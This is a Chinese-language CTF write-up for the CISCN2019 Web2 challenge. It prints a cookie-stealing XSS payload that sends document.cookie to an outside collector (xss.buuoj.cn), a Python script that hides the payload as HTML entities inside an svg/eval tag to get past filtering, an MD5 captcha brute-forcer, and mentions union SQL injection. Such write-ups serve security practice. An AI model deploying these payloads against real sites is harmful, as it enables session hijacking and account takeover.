[CISCN2019 华东北赛区]Web2刷题笔记

最近的学习时间大部分用在了新东西上面，只靠刷刷freebuf偶尔刷道ctf题来温一温之前的方向了

题目登陆注册后可以发表投稿和反馈，提供了xss平台

存在admin.php页面需要身份认证才能访问

思路：投稿带有xss代码，反馈去让管理员访问，打到管理员cookie进入admin.php

xss平台源码

(function(){(new Image()).src='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://xss.buuoj.cn/index.php?do=keepsession&id=hPpiFj&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

将(new Image()).src改为window.location.href，把新建图像的函数改为直接跳转

直接交平台给出来的会被过滤，用html编码进行绕过，利用svg标签，eval执行代码

html编码并生成payload脚本

words="(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
re=""
for c in words:
    re+="&#"+str(ord(c))

print("<svg><script>eval"+re+"</script>")

提交后拿到页面的url到反馈页面提交

需要验证码md5前六位为固定值，脚本爆破即可

import hashlib

for i in range(1,10000000000):
    md = hashlib.md5(str(i).encode("utf-8")).hexdigest()
    if md[0:6]=='6a1b6f':
        print(i)

提交成功后拿到管理员cookie，携带后访问admin.php

最简单的联合注入拿flag